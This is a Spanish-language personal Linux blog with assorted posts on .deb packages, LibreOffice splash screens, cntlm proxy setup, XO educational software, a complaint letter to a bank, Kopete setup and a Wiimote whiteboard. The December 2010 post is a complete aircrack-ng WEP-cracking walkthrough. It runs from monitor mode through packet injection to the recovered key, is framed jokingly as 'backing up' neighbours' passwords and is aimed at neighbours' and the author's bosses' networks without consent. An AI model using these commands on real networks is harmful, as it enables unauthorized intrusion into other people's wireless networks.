Búsqueda

martes, 30 de octubre de 2012

Algunos debs totoposteados

De vez en cuando me gustan algunos programas que no vienen en Debian, y en ocasiones vienen en las versiones anteriores y el binario mas reciente que distribuyen sus creadores son funcionales, por eso comparto acá algunos de esos programas paquetes, convertidos en archivos deb para poder hacer dpkg -i, los deb que hice el deb que sobrevivió no es son la gran cosa, pero sirven para facilitar la tarea de instalar y desinstalar, y si desean pueden urgar el paquete para no desconfiar del mismo ;)

Un tema de iconos, kfaenza, se encuentra en kde-look.org en tarbal, acá les comparto el deb:
kfaenza-icon-theme.deb

Un diseñador de bases de datos, dbdesignerfork, me gusta porque puedo exportar guiones sql a postgres con él:
dbdesigner-1.0_all.deb

Un editor para aprender a programar con pseudolenguaje en español. Muy bueno llamado pseint:
pseint-1.3.2_all.deb

El programador de Arduino, la versión 1.0.1 es compatible con un arduino que me conseguí y la que venía en Debian Squeeze no, así que ahí esta:
arduino-1.0.1_all.deb

A medida siga haciendo este tipo de chunches, los iré subiendo para compartirlos, aviso de antemano que NO SON paquetes bien armados, simplemente son para facilitar la instalación y desinstalación en Debian Squeeze.

Saludos a todos

viernes, 6 de julio de 2012

Un splash de libreoffice adaptado para el trabajo

Existen buenos temas para aplicar en la pantalla de inicio de LibreOffice, durante este año se procedió a promoverlo mucho pues el MINED usará LibreOffice para las estaciones de trabajo, por lo que un buen amigo adapto una de esas pantallas (Basado en el tema de Trisquel), agregándole un logo de la institución con Gimp.

Así que para que varios usuarios puedan compartirlo se creo un script que pudiese facilitar la instalación en Debian (siempre y cuando libreoffice se instalase desde los repositorios), pongo acá a disposición el arhcivo compreso para que puedan descargarlo, compartirlo o modificarlo como se les antoje :) splash.tbz

Para poder instalarlo, sólo hay que descomprimirlo y como root ejecutar el guión de bash que viene dentro de la carpeta:

tar xvfj splash.tbz
cd splash
./instalar.sh

miércoles, 13 de junio de 2012

Saliendose de la red rempujadito con vaselina

Actualmente en muchos lugares se tiene una red con un proxy 'fello' de esos de la empresa M$, por lo que hacer que estaciones que utilizan GNU/Linux puedan navegar sin complicaciones y utilizar todas las ventajas de aplicaciones conectadas a la red que utilizan ese 'fello' proxy es tortuoso.

Había probado anteriormente con el uso de ntlmaps, y por razones que no comprendo la configuración en un reinicio desde consola no se cargaba, por lo que mi inexperiencia me llevó a reiniciar todo el equipo cada vez que sucedía.

También sucedía que en la navegación no cargaba todos los contenidos de las páginas web a al primera, tenía que realizar un refresco de página para poder ver los contenidos faltantes.

Luego buscando una alternativa me tope con el programa cntlm, que hace exactamente lo mismo, y la configuración es más simple.

Desde nuestros queridísimos y amadísimos repositorios de Debian podemos hacer la instalación con un simple:
aptitude install cntlm

Luego hay que configurar el archivo /etc/cntlm.conf:
nano /etc/cntlm.conf

En las primeras líneas (de la 8 a la 10) encontramos un texto como el siguiente:
Username        testuser
Domain          corp-uk
Password        password


Las cambiamos por nuestro respectivo usuario, y comentamos la Password para que no quede en texto plano, luego la colocaremos como se debe, dejando por el momento las lineas como el ejemplo siguiente:
Username        gato
Domain          ministerio.gob.sv
#Password       password

Luego se guarda el archivo, y se procede a conseguir la pasword en modo encriptado... o por lo menos más difícil de distinguir en el texto plano, por lo que hay que ejecutar desde la linea de comandos lo siguiente:
cntlm -H

Esto pedirá una password, hay que introducir la que tengamos en nuestro dominio W$ y generará el hash de varios tipos de posibles autenticaciones para el usuario creado, muy parecido a lo siguiente:
PassLM          EF6470B2EB92A88EC2E36D82E36F3983
PassNT          3671C476E516996470735032B0432B13
PassNTLMv2      10C8E4D429A6A3880DDEB64700067403    # Only for user 'gato', domain 'ministerio.gob.sv'

Hay que copiar las tres lineas y agregarlas en el archivo que editamos antes (/etc/cntlm.conf) quedando así:
Username        gato
Domain          ministerio.gob.sv
#Password       password
PassLM          EF6470B2EB92A88EC2E36D82E36F3983
PassNT          3671C476E516996470735032B0432B13
PassNTLMv2      10C8E4D429A6A3880DDEB64700067403    # Only for user 'gato', domain 'ministerio.gob.sv'

Y antes de guardarlo buscamos (aproximadamente en la línea 32) la variable Proxy , la cual la modificaremos para que quede justo como sea que este configurado nuestro proxy indicando la ip, seguida de dos puntos y el puerto, tal como este el de M$ en la institución, como por ejemplo así:
Proxy           192.168.19.40:80

Ahora si, hay que guardarlo, y una vez guardado se reinicia el servicio:
/etc/init.d/cntlm restart

Luego de eso, es de configurar los navegadores y demás chunches que usen proxy, indicando que el proxy es localhost y el puerto 3128, de manera que en kde por ejemplo se puede configurar globalmente para todas las aplicaciones de kde o según sea el caso de cada aplicación.

Espero les sea de utilidad :)

sábado, 22 de enero de 2011

Actividades de la XO y otros recursos libres

 Hace un poco mas de un año que conocí la XO, me pareció una herramienta educativa muy útil para el niño/a en la estimulacion de su aprendizaje y crearle esa curiosidad por la tecnología. A parte que les ayuda muchísimo a estimular su imaginación.

Hace un poco mas de un año..comenzamos con mi esposo en la creación de guiones de clase(posteado anteriormente) de algunas actividades orientadas a la educación parvularia(niños de 4,5,6 años) que se le instalaron a la XO para un proyecto que se esta dando en algunos lugares de nuestro país.

  Por acá esta este enlace que nos facilitara un poco mas el uso de la actividad Tam Tam Mini y unas canciones que se pueden tocar
Guia de uso y canciones para Tam Tam mini

  Para los que tienen problemitas con el Tux Paint por acá les dejo un manual, para que les sirva como una guia. Hay varios manuales en la red, pero este es el que explica mas :)
Manual de Tux Paint

Si por si acaso no lo tienen y tienen la curiosidad de usarlo, y que tus alumnos/as o sus hijos lo puedan usar, por acá están unos enlaces para bajarlo, es completamente libre, lo puedes bajar y usar cuando quieras, es la ventaja de ser software libre
Bajar Tuxpaint
Bajar Tuxpaint En este enlace te vas hasta abajo de la pagina y le haces click a descarga externa.
Bajar Tux Paint
En cualquiera de estos tres enlaces puedes bajarte este programa, que se puede utilizar tanto en tu computadora como en la XO.

    Buscando entre uno y otro enlace de algunas actividades para la XO..llegue hasta este lugar, es de Uruguay, pero tiene unos lindos recursos para el docente, para aquel que necesita alguna idea o ayuda en su salón de clases, PLAN CEIBAL, muy bueno, excelente  Recursos educativos recomendados

Espero que esto les ayude a aquellos que tienen algunas dudas sobre las actividades Tam Tam Mini, y Tuxpaint, los enlaces tienen mucha información,y lo mejor que es libre, y en dado caso se puede retomar y adaptar al ámbito de nuestro país El Salvador.   :)

jueves, 2 de diciembre de 2010

Respaldando la contraseña de los puntos de acceso de nuestros vecinos

Se nos ha presentado en muchas ocasiones la necesidad de poder ayudar a que nuestro vecinos, que tienen sus puntos de acceso protegidos con claves de tipo WEP, nunca olviden o pierdan sus contraseñas.
Como buenos ciudadanos podemos usar herramientas de Software Libre para colaborarles en la tarea de almacenarles caritativamente sus contraseñas en nuestro basto espacio de disco duro :).
Primero que nada necesitamos una tarjeta de red inalámbrica con capacidades para hacer esta tarea, son muy famosas las de chip Atheros para estas tareas, aunque hace poco probé con una Broadcom en la oficina y cuando mis jefes se enteren de que respalde la contraseña de su red creo que se sentirán muy orgullosos de que busco la manera para que no olviden como acceder a su red inalámbrica con mayores libertades que la institucional.
Bueno lo segundo es tener un flamante GNU/Linux instalado con la tarjeta de red configurada, en mi caso el poderoso Debian es suficiente, en el existen las herramientas necesarias para lograrlo.
Empezando hay que instalar el paquete aircrack-ng por si no está instalado:
# aptitude install aircrack-ng
Una vez con esto instalado primero tenemos que tomar algunos datos importantes, el primero es que tenemos que saber cosas del punto de acceso, y esas cosas son el nombre, la dirección de hardware y el canal por el cual envía la señal, para ello ejecutamos el siguiente comando:
# iwlist wlan0 scann | grep Cell -A 5
Esto mostrará una salida como esta:
Cell 01 - Address: 64:68:0C:77:A7:E4
                    Channel:1
                    Frequency:2.412 GHz (Channel 1)
                    Quality=51/70  Signal level=-59 dBm  
                    Encryption key:on
                    ESSID:"VECINO"
De ahí sacamos los datos de la dirección de hardware:

Address: 64:68:0C:77:A7:E4

El canal por el cual transmite:

Channel:1

Y el nombre de la red:

ESSID:"VECINO"

Con estos datos ya podremos proceder a buscar como respaldar la contraseña de ese punto de acceso, primero debemos colocar nuestra tarjeta en modo monitor:
# airmon-ng start wlan0 1
En lo anterior wlan0 es el nombre de la tarjeta de red en el sistema operativo y el 1 es el canal al que necesitamos conectarnos, al hacer eso crea un monitor como si fuera una interfaz adicional de tarjeta de red y le llama mon0 (sí se ejecuta varias veces mon1, mon2, etc...).
Despues hay que empezar a capturar paquetes de transito de esa red, para lo que se usa la herramienta de captura de los datos.
# airodump-ng -c 1 -w wep123 --bssid "64:68:0C:77:A7:E4" mon0
En el comando anterior va un '-c 1', donde el 1 es el canal otra vez y "64:68:0C:77:A7:E4" es la dirección de hardware del punto de acceso, y 'wep123' es el patron de un grupo de archivos que llevarán ese nombre en la carpeta donde se está ejecutando el comando.
Esto ocupara la terminal, por lo que sería bueno ocupar otra terminal para seguir, teniendo que asociarse al punto de acceso para poder generarle tráfico, se hace una asociación breve con:
# aireplay-ng -1 0 -a "64:68:0C:77:A7:E4" -e "VECINO" mon0
En el comando anterior otra vez se puede identificar la dirección de hardware "64:68:0C:77:A7:E4" y el nombre del punto de acceso "VECINO" y la interfaz que hace de monitor mon0, luego de ejecutar esto dice Association succesful :-), lo que significa que estamos asociados al punto de acceso.

Acto seguido hay que hacer que el punto de acceso genere tráfico, y como es de esperarse a veces nuestros vecinos no es que pasen ocupando mucho la completa capacidad del punto de acceso, así que hay que ayudarles a que generen ese tráfico de red con el comando siguiente:
# aireplay-ng -3 -b "64:68:0C:77:A7:E4" mon0
Ya aburro escribiéndolo pero es necesario reacalcarlo, en la ejecución anterior se nota la dirección de hardware del punto de acceso "64:68:0C:77:A7:E4" y la interfaz del monitor mon0.
Al hacer esto nuevamente la terminal será acaparada, pues mostrará que está enviando paquetes y verán un número incrementarse, en la primera consola o terminal que dejamos trabajando al inicio también veremos que en la tabla mostrada, bajo la columna que dice #Data habrá un número incrementándose de manera muy rápida (y que antes no lo hacía), hay que esperar a que llegue a un número de 20,000 o mas (no se tardará mucho en hacerlo).
Una vez echo esto de haber esperado a 20,000 paquetes o más en la ejecución de la captura de datos de esa tabla, hay que cancelarla con [Control] + [C].
Inmediatamente hay que ver que los archivos del directorio están listos para ser analizados, las capturas las almacena con un identificador en el nombre, por lo que si es la primera vez el archivo que necesitamos se llama wep123-01.cap, (pero si hemos ejecutado este comando muchas veces el número después del guión variaría como por ejemplo wep123-09.cap) asumiendo que todo está bien y es nuestra primera vez que deseamos ayudar a nuestro vecino sólo nos falta ejecutar este comando:
# aircrack-ng -n 64 -b "64:68:0C:77:A7:E4" wep123-01.cap
Luego de un par de extraños códigos que se mueven en nuestra pantalla veremos aparecer abajo de ellos algo parecido a esto:
KEY FOUND! [ 68:0C:77:A7:E3 ]
Esta clave encontrada en el ejemplo es un hexadecimal, por lo que al ponerla en las configuraciones de red no es necesario colocar los dos puntos entre cada número, hay casos en que la contraseña es alfanumérica y aparece como tal al final del ejercicio.
Ahí termina nuestra afable labor de conservarle la contraseña a nuestro vecino, pudiendo almacenarla en nuestro catálogo amplio de datos que no debemos olvidar para cuando sean necesarios.
Espero que seamos personas de bien y le ayudemos a toda la colonia a poder recordarles las claves de los puntos de acceso donde sean necesarios, incluso a nuestros jefes por si se les olvida ;).

viernes, 2 de julio de 2010

Carta de enojo abierta al Banco Agrícola por su µ!3®ð4 de teclado virtual

Escribí un mensaje encachimbado porque me tocó resetar la password, a causa de la implementación del teclado virtual del sitio e-banca, pues queriendo comprobar su afirmación acerca de las minúsculas, terminé bloqueando mi usuario.

Luego al acceder intente escribirles un mensaje en la opción de "contactenos", y misteriosamente se me cerró, zopapeé la mesa donde me encontraba y escribí este otro mensaje, que creo les irá a caer en /dev/null, más el intento lo hice y quisiera compartir mi disconformidad

Acerca del teclado virtual

El teclado virtual que han decidido colocar para el acceso web al sistema de e-banca no contribuye en la seguridad, al contrario la hace mas vulnerable para los usuarios mas habidos.

1 - Es mas fácil ver detrás de un usuario sobre que teclas virtuales hizo clic pues no las tapan sus manos como en el caso del teclado.
2 - Limitan al usuario a usar claves inseguras de 65 posibles caracteres por byte, ante la verdadera posibilidad de usar 256 posibles caracteres que brinda la tabla ASCII, y que decir en el caso de UTF8
3 - Su servicio al cliente es perturbador, al tratar de convencer al usuario en que solo acepta mayúsculas y no hace distinción de las minúsculas (lo he comprobado el día de hoy 2/Jul/2010).

Seguramente no tratan de resolver problemas tan importantes como estos en los que lejos de colaborar en la seguridad del usuario causan una gran incomodidad, la alternativa decidida (con las disculpas del caso) es bajo completa ignorancia de la persona que lo sugirió y del que lo acepto para que se implementara.

El teclado virtual en sitios seguros (bajo protocolos de ssl como https que es el que usan) pueden ser de utilidad para personas que necesitan accesibilidad a su interfaz, por lo que es bueno para esa característica pero no para la seguridad.

Tienen otra limitante en cuanto a la longitud de la contraseña, los sistemas informáticos que piensan en detalles de seguridad implementan en la actualidad el concepto de PASPHRASE el cual consiste en el uso de claves de acceso de mayor longitud (literalmente frases de paso).

Muchos de los usuarios de sus servicios, en los cuales confiamos como empresa nos parecen adecuados, por eso hacer notar este tipo de errores es necesario. Dentro de ese grupo de clientes existen varios expertos del campo de la informática (no me incluyó pues carezco de título universitario que me lo respalde), pero consideren que es como ofrecer lodo en vez de café a sus visitantes al brindar servicios que degradan la imagen que pueda tenerse de su corporación.

Se que de alguna manera no tomarán en cuenta este mensaje, dado que es mi segundo intento de escribirlo (la primera vez la interfaz web se me cerró misteriosamente antes de poder enviarlo... ¿habrá vencido la variable de sesión web?) y espero que si aún persisten en mantener esa ridícula herramienta para acceso consideren la opinión de mejorar por lo menos con la longitud de las contraseñas e incluirles caracteres adicionales como los que se encuentran en la tabla UTF-8.

Acá les dejo un enlace de un teclado virtual muy parecido al suyo que incluye las minúsculas, podrían fácilmente adaptarlo para darle la supuesta seguridad de alternar las teclas y los colorcitos #2E659D y #3173B8 que actualmente usan en su css.


Atentamente
José David Calderón Serrano
"Nunca se tiene suficiente de algo bueno"
- Gato Garfield -

miércoles, 30 de junio de 2010

Conectando kopete a la mensajería del correo de esdebian.org

Para los compañeros de la comunidad esdebian que poseen cuenta de correo y gustan de usar kopete para la mensajería, busqué la información de como lograr conectarse; sin embargo no encontré googleando como hacerlo, suponiendo que al ser un servicio de google apps, podría ser una conexión similar, entonces los parámetros deberían ser iguales.

Por si alguien más no lo había intentado agrego aquí las capturas de pantalla para guiarse en kopete (para kde 3.5 de lenny).

En kopete nos vamos al cuadro de dialogo Configurar... del menú Preferencias.
Preferencias

Ahí elegimos Cuentas y le damos presionamos el botón Nuevo...
Nuevo...

El protocolo a seleccionar es jabber y presionamos el botón Adelante.
Adelante

Luego en el campo usuario hay que colocar nuestro usuario seguido de @esdebian.org, si deseamos también colocamos la contraseña para que la almacene kopete, y presionamos la pestaña de Conexión.
Conexion

Y es en éste dialogo donde configuramos que se conecte al servidor, indicándole que use cifrado en el protocolo y que el servidor es talk.google.com, el puerto debe ser 5223, aunque supongo que igual debería funcionar el 443, luego le damos al botón Aceptar.
Aceptar

y finalmente elegimos si deseamos un color decente para identificar el icono del foco de la cuenta, y presionamos el botón Finalizar.
Finalizar

Luego al conectarse preguntará si deseamos aceptar el certificado de cifrado, a lo que obviamente le daremos aceptar, y podremos conversar en linea con nuestros contactos agregados a la cuenta de nuestro usuario@esdebian.org.

miércoles, 23 de junio de 2010

Divirtiéndose con un wiimote para trabajar...

Me pareció interesante poder probar algunos inventos que ya tienen ratos de estar ahí, pero hasta no ver la necesidad ni la oportunidad nunca me meto a probarlos, muchos otras personas en este país los han llevado a cabo, y muy probablemente estén publicados... pero a ninguno conozco, por eso me dedique a aprender un poco e intentar repetir el experimento.

Primero me tope con el video de un tipo llamado Johnny Lee Chung, quien desarrollo un software para interactuar de una manera interesante con un wiimote, y una de sus aplicaciones fue la de hacer una pizarra interactiva para las masas, tiene muchas ideas grandiosas y el simple hecho de que fuese “para las masas” me motivo lo suficiente como para poder intentar echar a andar ese proyecto en especial.

Primero busque la información acerca de ello, y pues quería saber si era posible que esto funcionara en GNU/Debian, puesto que no comprometería a nadie a usar cosas que le comprometan a gastar o a cometer actos inadecuados, y documento la experiencia para futur@s travies@s y que no cometan los errores por los que pasé.

Materiales:
  • Un led infrarrojo (casi $0.90)
  • Una resistencia de 30 ohmios (como a $0.30)
  • Un plumón viejo usado (¿$1.00 nuevo?)
  • Un soldador para unir los componentes (de los baratos de a $5.00)
  • Un soldador viejo para cortar y deformar plásticos (de los mismos baratos de a $5.00)
  • Estaño (un chirustillo $0.25)
  • Alambres delgados (cuatro chilillos $0.10)
  • Un interruptor pequeño (¿serán a $0.50?)
  • Dos baterías doble A (a $1.50 el par)
  • Cinta aislante (en las librerías están a $2.00)
  • Una computadora (preferiblemente con webcam) para probar (a $310.00 el cutupito)
  • Un mini dispositivo bluetooth de usb (dicen que un tal gato los vende a $3.00... ¡¡¡Estafador, Turco!!!)
  • GNU/Debian (¡¡¡No tiene precio!!!)

Los materiales a utilizar pueden ser conseguidos en cualquier tienda de electrónica, en mi caso gracias a un amigo del trabajo pude conseguirlos “de choto”, y también otro buen amigo me prestó el WiiMote, el circuito sugerido por Johnny para el puntero infrarrojo da las posibles variantes, y al final (luego de quemar un IR) construí uno basado en este diseño:

Opto por hacer primero el puntero, pues requiere paciencia y esmero, mi peripecia fué que casi todas las cosas las conseguí de chunches tirados que se guardar, así que para esta experiencia casi todo me salió gratis., tenía un montón de alambres de los leds de las compus viejas que han pasado por el hogar, aunque no se ni maicena de electrónica tengo soldadores y un par de chipustillos de estaño, otro amigo al verme necesitado de interruptores me donó uno muy bonito, y aunque quemé el primero el amigo del trabajo me donó otro con tal de que lo logrará, obteniendo este moustrito final:

Bien una vez armado el cuenterete necesitamos el software (mas otras hierbas útiles) funcionando en nuestra máquina, desde nuestra fabulosa terminal como root le decimos a la linea de ordenes:

root@tucacharro:~#aptitude install python-bluez python-qt4 python-numpy python-cwiid python-xlib python python-support libcwiid1 lswm wmgui wminput

Esto lo probé en Lenny, pueda que sean los mismos nombres en los paquetes de squeeze, existe un paquete llamado gtkwhiteboard, mas no me fue tan bien por lo que encontré otro llamado python-whiteboard que será la recomendación:


Lo descargamos y lo instalamos como root:

root@tucacharro:~#wget -c http://github.com/downloads/pnegre/python-whiteboard/python-whiteboard_0.3_all.deb
root@tucacharro:~#dpkg -i python-whiteboard_0.3_all.deb

Una vez instalado lo ejecutamos como un usuario común:

usuario@tucacharro:~$python-whiteboard

Saldrá la pantallita del programa que nos permitirá conectarnos al wiimote y calibrarlo.

El wiimote debe estar dispuesto de manera que haga un angulo de 45 grados con respecto a la pantalla que se utilizará ya sea la de la computadora o la imagen mostrada desde el proyector.

La distancia debe ser los suficiente mente cerca para que el wiimote pueda “ver” el área completa y que pueda percibir la señal del plumón infrarrojo.

Con el wiimote fijo en algún lugar se procede a detectarlo con el python-witheboard, dándole al botón Connect y luego presionando los botones 1 y 2 del wiimote, sí logra detectarlo dará mostrará el nivel de la batería inmediatamente y el botón cambia a Disconnect.

En ocasiones aparece que no se conecta inmediatamente solo hay que volver a darle al botón Connect, una vez conectado se procede con la calibración.

En la calibración es de hacer “clic”cerrando el circuito con el interruptor del plumón infrarrojo en las esquinas parpadeantes, cuando esta detectando la posición un círculo al centro se va formando, indicando que el proceso de calibración se está haciendo correctamente por cada punto.

Al terminar la calibración mostrará en el área bajo el indicador de la batería un diagrama vectorial representando como es que ha percibido la orientación de la pantalla capturada.

Finalmente se empieza a utilizar con el botón Activate. Y pues ya eso es jugar... posiblemente se caiga de vez en cuando la conexión bastará con volver darle al botón Desactivate y Activate nuevamente.


Acá dejo el video para comprobarles que si furula bien el asunto.

Agradezco a mis amigos Manuel Escalante, Manuel Barrios, Miguel Campos por su apoyo y especialmente a mi linda y paciente esposa que me incentiva y me permite dedicarme a estas locuras.